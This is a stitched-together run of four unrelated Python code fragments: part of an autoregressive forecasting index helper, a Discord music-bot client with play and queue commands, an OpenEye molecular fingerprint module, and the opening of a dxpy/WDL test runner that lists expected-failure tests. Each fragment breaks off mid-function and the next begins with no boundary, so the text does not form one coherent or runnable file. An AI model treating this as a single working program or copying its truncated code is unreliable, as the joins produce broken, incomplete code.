input_k = check_input_k(input_k, ar_iterations) output_k = check_output_k(output_k) # Compute index of Y labels dict_Y = {} for i in range(ar_iterations+1): dict_Y[i] = 
get_idx_forecast(idx_start=0, ar_iteration=i, forecast_cycle=forecast_cycle, output_k=output_k) # Compute index of future X that need to be stacked from previous predicted Y dict_X_future = {} for i in range(ar_iterations+1): idxs = get_idx_lag(idx_start=0, ar_iteration=i, forecast_cycle=forecast_cycle, input_k=input_k) idxs_future_data = idxs[idxs >= 0] if (idxs_future_data.size == 0): dict_X_future[i] = None else: dict_X_future[i] = idxs_future_data ##------------------------------------------------------------------------. # - Define an index to choose which of the previous available prediction to take if stack_most_recent_prediction: idx_to_select = -1 # take the last available prediction performed else: idx_to_select = 0 # take the first available prediction performed ##------------------------------------------------------------------------. # - Retrieve leadtime and time index of Y that need to be stacked to X dict_Y_to_stack = {} try: for i, idx_X_future in dict_X_future.items(): if idx_X_future is None: dict_Y_to_stack[i] = None else: l_tuple_idx = [] # Search for each X_future_index, the leadtime and tensor index from which to take the data for idx in idx_X_future: # Search only in Y data already predicted -> range(i) and not range(i+1) # - Return a list of tuples [(L0, idx) of possible solutions l_solutions = [(j, np.argwhere(dict_Y[j] == idx).tolist()[0][0]) for j in range(i) if idx in dict_Y[j] ] # - Select first or last based on 'stack_most_recent_prediction' option l_tuple_idx.append(l_solutions[idx_to_select]) # Add to the dictionary dict_Y_to_stack[i] = l_tuple_idx except IndexError: raise ValueError("Review the AR settings. AR training is not possible with the current configuration!") ##------------------------------------------------------------------------. 
# - Construct dictionary specifying when to remove predicted Y (from GPU) dict_Y_to_remove = {} idx_arr_removed = np.array([]) # Initialize # Start looping from the last forecast iteration (to the first) for i in range(ar_iterations+1)[::-1]: l_tuple = dict_Y_to_stack[i] # Skip leadtime when no Y data to stack if l_tuple is None: dict_Y_to_remove[i] = None else: # Retrieve required leadtime at given forecast iteration leadtime_arr = np.array([tuple2[0] for tuple2 in l_tuple]) # Select the one can be deleted leadtime_arr = leadtime_arr[np.isin(leadtime_arr, idx_arr_removed, invert=True)] if leadtime_arr.size == 0: dict_Y_to_remove[i] = None else: dict_Y_to_remove[i] = leadtime_arr.tolist() # Update idx_arr_removed idx_arr_removed = np.append(idx_arr_removed, leadtime_arr) return (dict_Y_to_stack, dict_Y_to_remove) #-----------------------------------------------------------------------------. ############### ### Checks #### ############### def check_input_k(input_k, ar_iterations): """Check validity of 'input_k' argument.""" if isinstance(input_k, list): input_k = np.array(input_k) # Check indexing is sorted increasingly if not is_sorted_array(input_k, increasing=True): raise ValueError("Provide input_k sorted increasingly") # Checks for forecasting mode if ar_iterations > 0: if np.any(input_k == 0): raise ValueError("input_k contains values equal to 0. Past timesteps must be specified with negative values") if np.all(input_k > 0): raise ValueError("input_k requires negative values in 'forecasting' mode") return input_k def check_output_k(output_k): """Check validity of 'output_k' argument.""" if isinstance(output_k, list): output_k = np.array(output_k) # Check indexing is sorted increasingly if not is_sorted_array(output_k, increasing=True): raise ValueError("Provide output_k sorted increasingly") # Check output_k contains at least a 0 if not np.any(output_k == 0): raise ValueError("output_k must start with a 0 value. 
0 indicates the 'current' timestep to predict.") return output_k def check_ar_iterations(ar_iterations): """Check validity of 'ar_iterations' argument.""" if not is_number(ar_iterations): raise TypeError("'ar_iterations' must be a single integer number") if not is_natural_number(ar_iterations): raise ValueError("'ar_iterations' must be a positive integer value") if ar_iterations < 0: raise ValueError("'ar_iterations' must be a positive integer value") if ar_iterations >= 1: print(' - Autoregressive training with %d AR iterations --> Specified.'% ar_iterations) ar_iterations = int(ar_iterations) return ar_iterations def check_forecast_cycle(forecast_cycle, ar_iterations): """Check validity of 'forecast_cycle' argument.""" if not is_number(ar_iterations): raise TypeError("'ar_iterations' must be a single integer number") if not is_natural_number(forecast_cycle): raise ValueError("'forecast_cycle' must be a positive integer value") if forecast_cycle < 1: raise ValueError("'forecast_cycle' must be equal or longer than 1") if forecast_cycle >= 1: print(' - Forecast cycle of %d --> Specified.'% forecast_cycle) forecast_cycle = int(forecast_cycle) return forecast_cycle def check_ar_settings(input_k, output_k, forecast_cycle, ar_iterations, stack_most_recent_prediction): """Check that AR settings arguments are valid.""" input_k = check_input_k(input_k=input_k, ar_iterations=ar_iterations) output_k = check_output_k(output_k=output_k) ar_iterations = check_ar_iterations(ar_iterations=ar_iterations) forecast_cycle = check_forecast_cycle(forecast_cycle=forecast_cycle, ar_iterations=ar_iterations) ##------------------------------------------------------------------------. 
# Check autoregressive training is feasible if ar_iterations >= 1: dict_Y_to_stack, _ = get_dict_stack_info(ar_iterations=ar_iterations, forecast_cycle=forecast_cycle, input_k=input_k, output_k=output_k, stack_most_recent_prediction = stack_most_recent_prediction) # if ar_iterations >= 1: # idxs_lag_0 = get_idx_lag(idx_start=0, ar_iteration=0, forecast_cycle=forecast_cycle, input_k=input_k) # idxs_forecasted_0 = get_idx_forecast(idx_start=0, ar_iteration=0, forecast_cycle=forecast_cycle, output_k=output_k) # idxs_lag_1 = get_idx_lag(idx_start=0, ar_iteration=1, forecast_cycle=forecast_cycle, input_k=input_k) # # idxs_forecasted_1 = get_idx_forecast(idx_start=0, ar_iteration=1, forecast_cycle=forecast_cycle, output_k=output_k) # idxs_available = np.concatenate((idxs_lag_0, idxs_forecasted_0)) # if np.any([v not in idxs_available for v in idxs_lag_1]): # raise ValueError("Review the autoregressive settings. Autoregressive training is not allowed with the current configuration!") ##------------------------------------------------------------------------. #-----------------------------------------------------------------------------. ############################## ### Plot AR configuration #### ############################## def _arr_window_info(input_k, output_k, forecast_cycle, ar_iterations, past_margin=0, future_margin=0): """Retrieve information of the data temporal window required for 1 training loop.""" past_idxs = past_margin + get_first_valid_idx(input_k=input_k) future_idxs = future_margin + get_last_valid_idx(output_k=output_k, forecast_cycle=forecast_cycle, ar_iterations=ar_iterations) idx_t_0 = past_idxs width = idx_t_0 + future_idxs + 1 height = ar_iterations + 1 return idx_t_0, width, height def plot_ar_settings(input_k, output_k, forecast_cycle, ar_iterations, stack_most_recent_prediction=True, past_margin=0, future_margin=0, hatch=True): """Plot the model AR configuration.""" ##------------------------------------------------------------------------. 
# Create forecast temporal data window idx_start, width, height = _arr_window_info(input_k=input_k, output_k=output_k, forecast_cycle=forecast_cycle, ar_iterations=ar_iterations, past_margin=past_margin, future_margin=future_margin) arr = np.zeros(shape = (height, width)) ##------------------------------------------------------------------------. # Create hatching array (only for forecasting mode) if ((ar_iterations >= 1) and hatch): hatch_arr = np.zeros(shape = (height, width)) dict_Y_to_stack, _ = get_dict_stack_info(ar_iterations=ar_iterations, forecast_cycle=forecast_cycle, input_k=input_k, output_k=output_k, stack_most_recent_prediction = stack_most_recent_prediction) dict_Y = get_dict_Y(ar_iterations=ar_iterations, forecast_cycle=forecast_cycle, output_k=output_k) for
import discord import inspect import aiohttp import re import threading import config import datetime as dt from .player import Player from .discord_server import Server from .utils import Utils from threading import Timer from discord_components import ( Button, ButtonStyle, DiscordComponents ) class Client(discord.Client): def __init__(self): intents = discord.Intents().default() intents.members = True super().__init__(intents=intents) # self.intents=intents self.aiosession = aiohttp.ClientSession(loop=self.loop) self.players = {} self.utils = Utils() async def get_voice_client(self, channel): if isinstance(channel, discord.Object): channel = self.get_channel(channel.id) if not isinstance(channel, discord.VoiceChannel): return if channel.guild.voice_client: return channel.guild.voice_client else: return await channel.connect(timeout=60, reconnect=True) async def get_player(self, channel) -> Player: guild = channel.guild if guild.id not in self.players: voice_client = await self.get_voice_client(channel) server = Server(guild) self._clear_queue(guild) player = Player(self, voice_client, server, self.utils) self.players[guild.id] = player return self.players[guild.id] def get_player_in(self, guild: discord.Guild) -> Player: return self.players.get(guild.id) async def on_ready(self): DiscordComponents(self) print(f'{self.user.name} has connected to Discord!') def afk_leave_channel(self, channel, player): if len(channel.members) == 1: self.loop.create_task(self.cmd_leave(channel, player)) async def on_voice_state_update(self, member, before, after): if before.channel and not after.channel and member.name != self.user.name: if len(before.channel.members) == 1: t = Timer(30, self.afk_leave_channel, [ before.channel, self.players[before.channel.guild.id]]) t.start() return if member.name == self.user.name and before.channel and not after.channel: player = self.get_player_in(before.channel.guild) if player: await player.stop() await player.disconnect(disconnected=True) 
if before.channel.guild.id in self.players: del self.players[before.channel.guild.id] async def on_message(self, message): await self.wait_until_ready() message_content = message.content.strip() if not message_content.startswith(config.PREFIX): return if message.author == self.user: return command, *args = message_content.split(' ') command = command[len(config.PREFIX):].lower( ).strip() # Rimuove il prefix dal comando handler = getattr(self, 'cmd_' + command, None) if handler: argspec = inspect.signature(handler) params = argspec.parameters.copy() handler_kwargs = {} if params.pop('message', None): handler_kwargs['message'] = message if params.pop('channel', None): handler_kwargs['channel'] = message.channel if params.pop('author', None): handler_kwargs['author'] = message.author if params.pop('guild', None): handler_kwargs['guild'] = message.guild if params.pop('player', None): if message.author.voice: handler_kwargs['player'] = await self.get_player(message.author.voice.channel) else: embed = discord.Embed( description=":warning: You have to be connected to a voice channel before you can use this command!", color=discord.Color.orange()) embed.set_footer(text="*Groovy 2.0 Reborn - Gumu#8447 & Ricc#8178", icon_url="https://morethantech.it/images/publications/222/2020122220219.png") await message.channel.send(embed=embed) return if params.pop('_player', None): handler_kwargs['_player'] = self.get_player_in(message.guild) if params.pop('voice_channel', None): handler_kwargs['voice_channel'] = message.guild.me.voice.channel if message.guild.me.voice else None if params.pop('args', None): handler_kwargs['args'] = args await handler(**handler_kwargs) async def cmd_play(self, message, player, channel, author, args): if player.current_radio: player.turn_radio_off() if not args: player.resume(channel) return link = args[0] if re.search("https:\/\/www\.youtube\.com\/watch\?v=.+", link): track = self.utils.get_youtube_metadata(link) if not track: await 
self._send_video_not_found_message(channel, link) return track = self._load_track(track, player, author.id) self.utils.search_url(track) elif re.search("https:\/\/open\.spotify\.com\/", link): spotify_response = self.utils.get_spotify_metadata(link) if "tracks" in spotify_response: tracks_list = spotify_response["tracks"] if "items" in tracks_list: tracks_list = tracks_list["items"] else: tracks_list = [spotify_response] first_track = tracks_list.pop(0) if "track" in first_track: first_track = first_track["track"] query = "{title} - {artists}".format( title=first_track["name"], artists=" ".join([artist["name"] for artist in first_track["artists"]]) ) youtube_track_id = self.utils.get_youtube_video(query) track = self.utils.get_youtube_metadata( f"https://www.youtube.com/watch?v={youtube_track_id}") if not track: track = { "title": first_track["name"], "artist": first_track["artists"][0]["name"], "isrc": first_track["external_ids"]["isrc"] if "external_ids" in first_track else None, "duration": first_track["duration_ms"] // 1000, "spotify_link": first_track["external_urls"]["spotify"] if first_track["external_urls"] else None } else: track["title"] = first_track["name"] track["artist"] = first_track["artists"][0]["name"] if "external_ids" in first_track: track["isrc"] = first_track["external_ids"]["isrc"] if first_track["external_urls"]: track["spotify_link"] = first_track["external_urls"]["spotify"] track = self._load_track(track, player, author.id) self.utils.search_url(track) if tracks_list: add_tracks = threading.Thread( target=self.add_spotify_tracks, args=(tracks_list, player, message, link)) add_tracks.start() else: youtube_track_id = self.utils.get_youtube_video(" ".join(args)) track = self.utils.get_youtube_metadata( f"https://www.youtube.com/watch?v={youtube_track_id}") if not track: await self._send_video_not_found_message(channel, " ".join(args)) return track = self._load_track(track, player, author.id) self.utils.search_url(track) player.play(channel) 
async def cmd_unpause(self, message, player): if not player.current_radio: player.resume() async def cmd_pause(self, message, player): if not player.current_radio: await message.add_reaction("⏸") player.pause() async def cmd_stop(self, message, player): # if not player.current_radio: await message.add_reaction("⏹") await player.stop() async def cmd_skip(self, message, player): await message.add_reaction("⏭") player.skip() async def cmd_next(self, message, player): await self.cmd_skip(message, player) async def cmd_back(self, message, player): await message.add_reaction("⏮") player.back() async def cmd_loop(self, message, player): if not player.current_radio: await message.add_reaction("🔂") player.track_loop(True) async def cmd_unloop(self, message, player): if not player.current_radio: await message.add_reaction("👌") player.track_loop(False) async def cmd_leave(self, channel, player, message=None): await self.cmd_clear(channel, player, message) await player.disconnect() del self.players[channel.guild.id] async def cmd_arrivederciiii(self, channel, player, message): await self.cmd_leave(channel, player, message) def _clear_queue(self, guild): server = Server(guild) tracks = server.get_queue() for track in tracks: server.delete_track(track.position) server.set_value({ "index": 0 }) async def cmd_clear(self, channel, player, message=None): self._clear_queue(channel.guild) if player: await player.stop() if message: await message.add_reaction("👌") def add_spotify_tracks(self, tracks_list, player, message, link): player.send_queued_tracks_message(len(tracks_list), link, message) for spotify_track in tracks_list: if "track" in spotify_track: spotify_track = spotify_track["track"] if not spotify_track: continue query = "{title} - {artists}".format( title=spotify_track["name"], artists=" ".join([artist["name"] for artist in spotify_track["artists"]]) ) youtube_track_id = self.utils.get_youtube_video(query) track = self.utils.get_youtube_metadata( 
f"https://www.youtube.com/watch?v={youtube_track_id}") if not track: track = { "title": spotify_track["name"], "artist": spotify_track["artists"][0]["name"], "isrc": spotify_track["external_ids"]["isrc"] if "external_ids" in spotify_track else None, "duration": spotify_track["duration_ms"] // 1000, "spotify_link": spotify_track["external_urls"]["spotify"] if spotify_track["external_urls"] else None } else: track["title"] = spotify_track["name"] if "external_ids" in spotify_track: track["isrc"] = spotify_track["external_ids"]["isrc"] track["artist"] = spotify_track["artists"][0]["name"] if spotify_track["external_urls"]: track["spotify_link"] = spotify_track["external_urls"]["spotify"] track = self._load_track(track, player, message.author.id) threading.Thread(target=self.utils.search_url, args=(track,)).start() def _load_track(self, track, player, user_id): track["position"] = len(player.server.get_queue()) track["added_by"] = str(user_id) track["DiscordServerID"] = player.server.id player.server.load_track(track) track = player.server.get_queue()[-1] return track async def cmd_queue(self, message, channel, author, player, start_index=None, interaction=None): if hasattr(player, "current_entry") and not player._current_entry: embed = discord.Embed( title="🎶 Queue", description="*The queue is empty*", color=discord.Color.green() ) if not interaction: await channel.send(embed=embed) else: await interaction.edit_origin(embed=embed) return embed = discord.Embed( title=f"🎶 Queue", color=discord.Color.green() ) if not player.is_stopped and not player.is_dead: playing_track = player._current_entry track_text = ( "**[{title}]({link})**".format( title=playing_track.title, link=playing_track.spotify_link if playing_track.spotify_link else playing_track.youtube_link, ) ) artist_text = ( "{artist}" .format( artist = playing_track.artist ) ) duration_text = ( "{time_elapsed} / {duration}" .format( time_elapsed=str(dt.timedelta(seconds=(player._current_player._player.loops * 20) 
// 1000)), duration=str(dt.timedelta(seconds=playing_track.duration)) ) ) embed.add_field( name="Now Playing", value=track_text, inline=True ) embed.add_field( name="Artist", value=artist_text, inline=True ) embed.add_field( name="Time Elapsed/Duration", value=duration_text, inline=True ) if not start_index: start_index = player._track_index queue = player.server.get_queue() trim_queue = queue[start_index + 1 : start_index + 11] if trim_queue: titles_text = "" artists_text = "" durations_text = "" for track in trim_queue: title = track.title if not len(track.title) <= 30: title = track.title[:27] + "..." titles_text += ( "{i})\t**[{title}]({link})**\n" .format( i=track.position - player._track_index, title=track.title, link=track.spotify_link if track.spotify_link else track.youtube_link ) ) artists_text += ( "{artist}\n" .format( artist = track.artist ) ) durations_text += "*{duration}*\n".format( duration=str(dt.timedelta(seconds=track.duration)) ) embed.add_field( name="Queued Tracks", value=titles_text, inline=True ) embed.add_field( name="Artist", value=artists_text, inline=True ) embed.add_field( name="Duration", value=durations_text, inline=True ) elif not embed.fields: embed = discord.Embed( title="🎶 Queue", description="*The queue is empty*", color=discord.Color.green() ) async def _next_queue_page(interaction): await self.cmd_queue(message, channel, author, player, start_index=int(float(interaction.custom_id) // 1), interaction=interaction) if not trim_queue: components = None else: components = [[ self.components_manager.add_callback( Button( style=ButtonStyle.blue, label="", emoji="⏪", custom_id=str(player._track_index + 0.1), disabled=(start_index - 10) < player._track_index ), _next_queue_page ), self.components_manager.add_callback( Button( style=ButtonStyle.blue, label="", emoji="⬅", custom_id=str(start_index - 10), disabled=(start_index - 10) < player._track_index ), _next_queue_page ), self.components_manager.add_callback( Button( 
style=ButtonStyle.blue, label="", emoji="➡", custom_id=str(start_index + 10), disabled=(start_index + 10) >= len(queue) ), _next_queue_page ), self.components_manager.add_callback( Button( style=ButtonStyle.blue, label="", emoji="⏩", custom_id=str(len(queue) // 10 * 10 + player._track_index + 0.1), disabled=(start_index + 10) >= len(queue) ), _next_queue_page ), ]] if not interaction: await channel.send(embed=embed, components=components) else: await interaction.edit_origin(embed=embed, components=components) return async def cmd_info(self, channel, player): ''' Send the song's info ''' if player.current_radio: return current_player = player._current_player queue = player.server.get_queue() track_index = player.server.get().index if current_player and len(queue) > track_index: track = queue[track_index] track_loops = current_player._player.loops + player._source_loops time_elapsed = (track_loops * 20) // 1000 blocks = (20 * time_elapsed) // track.duration status_play_bar = "[" total_blocks = 20 for _ in range(blocks): status_play_bar += '▬' total_blocks -= 1 status_play_bar += "🔘]({link})".format(link=track.spotify_link if track.spotify_link else track.youtube_link) for _ in range(total_blocks): status_play_bar += "▬" embed = discord.Embed(title=f":headphones: {track.title}", description=f"**{status_play_bar}**" , color=discord.Color.green()) embed.add_field(name=":alarm_clock: Track duration", value=str( dt.timedelta(seconds=track.duration))) embed.add_field(name=":hourglass: Time elapsed", value=str( dt.timedelta(seconds=time_elapsed))) embed.set_footer(text="Groovy 2.0 Reborn - Gumu#8447 & Ricc#8178", icon_url="https://morethantech.it/images/publications/222/2020122220219.png") await channel.send(embed=embed) else: embed = discord.Embed( title=":warning: **No song is playing!**", description="Play a song in order to see all informations", color=discord.Color.orange() ) await channel.send(embed=embed) async def cmd_shuffle(self, message, channel, player): if 
player.current_radio: return if player.shuffle(): await message.add_reaction("🔀") else: embed = discord.Embed( title=":warning: **There are no songs in queue**", description="Play some songs to shuffle them", color=discord.Color.orange() ) await channel.send(embed=embed) async def cmd_fastforward(self, message, player, channel, args): if player.current_radio: return sec = 10 if args: try: sec = int(args[0]) except ValueError: pass player.fastforward(sec=sec) await message.add_reaction("⏩") async def _send_video_not_found_message(self, channel, asked_video):
"""Create OpenEye fingerprints """ # Copyright (c) 2010 <NAME> Scientific, AB (Gothenburg, Sweden) # Licensed under "the MIT license" # See the contents of COPYING or "__init__.py" for full license details. from __future__ import absolute_import import sys import os import errno import ctypes import warnings import errno from openeye.oechem import * from openeye.oegraphsim import * from . import ParseError from . import types from . import io from . import error_handlers from . import argparse __all__ = ["read_structures", "get_path_fingerprinter", "get_maccs_fingerprinter"] class UnknownFormat(KeyError): def __str__(self): return "Unknown format %r" % (self.args[0],) ############# Used when generate the FPS header SOFTWARE = "OEGraphSim/%(release)s (%(version)s)" % dict( release = OEGraphSimGetRelease(), version = OEGraphSimGetVersion()) ##### Handle the atom and bond type flags for path fingerprints # The atom and bond type flags can be specified on the command-line # # --atype=DefaultAtom --btype=BondOrder,InRing # --atype AtomicNumber,InRing --btype DefaultBond,InRing # # The type fields may be separated by either a "," or a "|". # The relevant OpenEye function (OEGetFPAtomType() and # OEGetFPBondType()) use a "|" but that requires escaping for # the shell, so I support "," as well. # There's another conversion of the integer type values into a string # representation, used when generating the canonical form of the # generation parameters for the FPS output. That case uses "|" # (and not ",") and omits the DefaultAtom and DefaultBond name. # The result is easier to parse with the OpenEye API functions. 
# (name, flag) pairs for every supported atom type, in OEChem's own naming.
_atype_flags = [(OEGetFPAtomType(atype), atype) for atype in
                (OEFPAtomType_Aromaticity,
                 OEFPAtomType_AtomicNumber,
                 OEFPAtomType_Chiral,
                 OEFPAtomType_EqAromatic,
                 OEFPAtomType_EqHalogen,
                 OEFPAtomType_FormalCharge,
                 OEFPAtomType_HvyDegree,
                 OEFPAtomType_Hybridization,
                 OEFPAtomType_InRing)]
_btype_flags = [(OEGetFPBondType(btype), btype) for btype in
                (OEFPBondType_BondOrder,
                 OEFPBondType_Chiral,
                 OEFPBondType_InRing)]

# Name -> integer flag lookup tables used by _get_type_value().
_atypes = dict(_atype_flags)
_btypes = dict(_btype_flags)

# I support the DefaultAtom and DefaultBond values but I'm worried
# that OpenEye will change the composition of those in the future. I
# talked with <NAME> and she says that that won't change, but
# I don't necessarily trust future maintainers. To minimize problems,
# I'll hard-code them the current Default* values.
_atype_flags.insert(0, ("DefaultAtom", 191))
_atypes["DefaultAtom"] = 191 # OEFPAtomType_DefaultAtom

_btype_flags.insert(0, ("DefaultBond", 3))
_btypes["DefaultBond"] = 3 # OEFPBondType_DefaultBond

## Go from a "," or "|" separated text field to an integer value
# Removes extra whitespace, but none should be present.
def _get_type_value(a_or_b, table, description):
    """OR together the flag values named in *description*, looked up in
    *table*. Raises ValueError on an empty or unknown flag name;
    *a_or_b* ("atom" or "bond") is only used in the error message."""
    value = 0
    # Allow both "|" and "," as separators
    # (Consistent with OEChem)
    description = description.replace("|", ",")
    for word in description.split(","):
        word = word.strip()
        try:
            value |= table[word]
        except KeyError:
            if not word:
                raise ValueError("Missing %s flag" % (a_or_b,))
            raise ValueError("Unknown %s type %r" % (a_or_b, word))
    return value

def atom_description_to_value(description):
    """atom_description_to_value(description) -> integer

    Convert an atom description like FormalCharge,EqHalogen or
    FormalCharge|EqHalogen into its atom type value.

    This is similar to OEGetFPAtomType except both "|" and "," are
    allowed separators and "DefaultAtom" is an allowed term.
    """
    return _get_type_value("atom", _atypes, description)

def bond_description_to_value(description):
    """bond_description_to_value(description) -> integer

    Convert a bond description like BondOrder,Chiral or
    BondOrder|Chiral into its bond type value.

    This is similar to OEGetFPBondType except both "|" and "," are
    allowed separators and "DefaultBond" is an allowed term.
    """
    return _get_type_value("bond", _btypes, description)

## Go from an integer value into a canonical description

# I could use OEGetFPAtomType() and OEGetFPBondType() but I wanted
# something which has a fixed sort order even for future releases,
# which isn't part of those functions.
def _get_type_description(a_or_b, flags, value):
    """Turn an integer flag *value* back into its canonical "|"-joined
    name string, using the fixed order of *flags*. Raises AssertionError
    if *value* contains bits not covered by *flags*."""
    words = []
    for (word, flag) in flags:
        if flag & value == flag:
            # After over 12 years of full-time use of Python,
            # I finally have a chance to use the xor operator.
            value = value ^ flag
            words.append(word)
    if value != 0:
        raise AssertionError("Unsupported %s value" % (a_or_b,))
    return "|".join(words)


def atom_value_to_description(value):
    """atom_value_to_description(value) -> string

    Convert from an atom type string into its text description,
    separated by "|"s. The result are compatible with OEGetFPAtomType
    and are in canonical order.
    """
    return _get_type_description("atom", _atype_flags, value)

def bond_value_to_description(value):
    """bond_value_to_description(value) -> string

    Convert from a bond type string into its text description,
    separated by "|"s. The result are compatible with OEGetFPBondType
    and are in canonical order.
    """
    return _get_type_description("bond", _btype_flags, value)

def decode_path_parameters(parameters):
    # Decode (name, value) string pairs into the kwargs expected by
    # get_path_fingerprinter().
    # NOTE(review): the "_maccs_*" table names here look like they should
    # be path-parameter tables (they hold numbits/minbonds/...); confirm
    # the naming against where _maccs_defaults/_maccs_decoders are defined.
    fingerprinter_kwargs = _maccs_defaults.copy()
    for name, value in parameters:
        if name not in _maccs_decoders:
            raise ValueError("Unknown OpenEye-Path parameter %r" % (name,))
        decoder = _maccs_decoders[name]
        fingerprinter_kwargs[name] = decoder(value)
    return fingerprinter_kwargs

# Per-parameter encoders used to build the canonical FPS header form.
_maccs_encoders = {"numbits": str,
                   "minbonds": str,
                   "maxbonds": str,
                   "atype": atom_value_to_description,
                   "btype": bond_value_to_description}

def encode_path_parameters(fingerprinter_kwargs):
    # Inverse of decode_path_parameters: kwargs -> {name: string} mapping.
    assert len(fingerprinter_kwargs) == len(_maccs_encoders)
    parameters = {}
    for name, encoder in _maccs_encoders.items():
        value = fingerprinter_kwargs[name]
        parameters[name] = encoder(value)
    return parameters

##### Create a function which generate fingerprints

# I use functions which return functions because it was a nice way to
# hide the differences between the two fingerprinters. I also found
# that I can save a bit of time by not creating a new fingerprint each
# time. The measured speedup is about 2% for MACCS166 and 6% for path
# fingerprints.

# Just like the OEGraphMol, these fingerprints must not be reused or
# stored. They are mutated EVERY TIME. They are NOT thread-safe.
# If you need to use these in multiple threads, then make multiple
# fingerprinters.

# Believe it or not, reusing the preallocated fingerprint measurably
# helps the performance.

def get_path_fingerprinter(numbits, minbonds, maxbonds, atype, btype):
    """Return a closure mapping an OE molecule to its path fingerprint
    as raw bytes. The returned callable reuses one OEFingerPrint and is
    therefore NOT thread-safe (see the notes above)."""
    # Extra level of error checking since I expect people will think
    # of this as part of the public API.
    if not (16 <= numbits <= 65536):
        raise ValueError("numbits must be between 16 and 65536 (inclusive)")
    if not (0 <= minbonds):
        raise ValueError("minbonds must be 0 or greater")
    if not (minbonds <= maxbonds):
        raise ValueError("maxbonds must not be smaller than minbonds")

    # XXX validate the atype and type values?
    # It's a simple mask against the | of all possible value, then test for 0.
    # However, I'm not sure what to report as the error message.

    fp = OEFingerPrint()
    fp.SetSize(numbits)
    # GetData() exposes the C storage; ctypes.string_at() reads it
    # without a copy per bit (see the byte/bit-order notes below).
    data_location = int(fp.GetData())
    num_bytes = (numbits+7)//8

    def path_fingerprinter(mol):
        OEMakePathFP(fp, mol, numbits, minbonds, maxbonds, atype, btype)
        return ctypes.string_at(data_location, num_bytes)

    return path_fingerprinter

def get_maccs_fingerprinter():
    """Return a closure mapping an OE molecule to its 166-bit MACCS
    fingerprint as raw bytes. Same reuse/thread-safety caveats as
    get_path_fingerprinter()."""
    fp = OEFingerPrint()
    # Call SetSize() now to force space allocation, so I only need one GetData()
    fp.SetSize(166)
    data_location = int(fp.GetData())
    num_bytes = (166+7)//8

    def maccs_fingerprinter(mol):
        OEMakeMACCS166FP(fp, mol)
        return ctypes.string_at(data_location, num_bytes)

    return maccs_fingerprinter

### A note on fingerprints and ctypes.string_at

# The FPS format and OEFingerPrint.GetData() values used identical bit
# and byte order. Bytes are in little-endian order and bits are in
# big-endian order. That means I can use GetData() to get the
# underlying C storage area, use ctypes to turn that into a Python
# string, which I then hex encode.

# The other option is to use OEFingerPrint.ToHexString(). But that's
# pure little endian, so I would need a transposition to make the bits
# be what I want them to be. OEChem's hex strings also end with a flag
# which says how many extra bits to trim, which I don't need since I
# handle it a different way.

# Here's some info about the bit order, which I tested by setting a
# few bits though the API then seeing what changed in the hex string
# and in the underlying GetData() field.
# The bit pattern # 01234567 89ABCDEF pure little endian # 10011100 01000011 # # 93 2C using ToHexString() (pure little endian) # 0x39 c2 using hex(ord(GetData())) (litle endian byte, big endian bit) # # 76543210 FEDCBA98 # 00111001 11000010 little endian byte, big endian bit ################ Handle formats # Make format names to OEChem format types _formats = { "smi": OEFormat_SMI, "ism": OEFormat_ISM, "can": OEFormat_CAN, "sdf": OEFormat_SDF, "mol": OEFormat_SDF, "skc": OEFormat_SKC, "mol2": OEFormat_MOL2, "mmod": OEFormat_MMOD, "oeb": OEFormat_OEB, "bin": OEFormat_BIN, } # Some trickiness to verify that the format specification is # supported, but without doing anything (yet) to set those flags. # I return a function which will set the file stream parameters # correctly. def _do_nothing(ifs): pass # Format is something like ".sdf.gz" or "pdb" or "smi.gz" def _get_format_setter(format=None): if format is None: return _do_nothing fmt = format.lower() is_compressed = 0 if fmt.endswith(".gz"): is_compressed = 1 fmt = fmt[:-3] # Should be something like ".sdf" or "sdf" or "smi" format_flag = _formats.get(fmt, None) if format_flag is None: raise ValueError("Unsupported format %r" % (format,)) def set_format(ifs): ifs.SetFormat(format_flag) if is_compressed: ifs.Setgz(is_compressed) return set_format def _open_stdin(set_format, aromaticity_flavor): ifs = oemolistream() ifs.open() set_format(ifs) if aromaticity_flavor is not None: flavor = ifs.GetFlavor(ifs.GetFormat()) flavor |= aromaticity_flavor ifs.SetFlavor(ifs.GetFormat(), flavor) return ifs def _open_ifs(filename, set_format, aromaticity_flavor): ifs = oemolistream() if not ifs.open(filename): # Let Python try to do
#!/usr/bin/env python3 import argparse import shutil from collections import namedtuple import dxpy import glob import hashlib import json import os import random import re import sys import subprocess import tempfile from termcolor import cprint import time import traceback from typing import List import yaml from dxpy.exceptions import DXJobFailureError import util here = os.path.dirname(sys.argv[0]) top_dir = os.path.dirname(os.path.abspath(here)) test_dir = os.path.join(os.path.abspath(top_dir), "test") default_instance_type = "mem1_ssd1_v2_x4" git_revision = subprocess.check_output( ["git", "describe", "--always", "--dirty", "--tags"] ).strip() test_files = {} expected_failure = { "bad_status", "bad_status2", "just_fail_wf", "missing_output", "docker_retry", "argument_list_too_long", "diskspace_exhauster", "symlink-illegal", "docker-array-secondaryfiles.1", "iwd-container-entryname2", "iwd-container-entryname3", "iwd-container-entryname4", "loadContents-limit", "cond-wf-003.3", "cond-wf-004.1", "cond-wf-005", "cond-wf-006.1", "cond-wf-012", "cond-wf-003-1.1", "cond-wf-003-1_nojs.1", "cond-wf-004_nojs.1", "cond-wf-005_nojs", "cond-wf-006_nojs.1", "cond-wf-012_nojs", "fail-unconnected", } test_compilation_failing = {"import_passwd"} wdl_v1_list = [ # calling native dx applets/apps "call_native_v1", "call_native_app", "cast", "dict", "instance_types", "linear_no_expressions", "linear", "optionals", "optionals3", "spaces_in_file_paths", "strings", "runtime_vs_static_type", "wf_person", "call_level2", "environment_passing_deep_nesting", "optional_output", "unpassed_default_arg", # workflows with nested blocks "two_levels", "three_levels", "four_levels", "param_passing", "nested_scatter", # Array input with no values "empty_array", # Map with a File key "map_file_key", # defaults and parameter passing "top_wf", "subworkflow_with_default", # can we download from a container? 
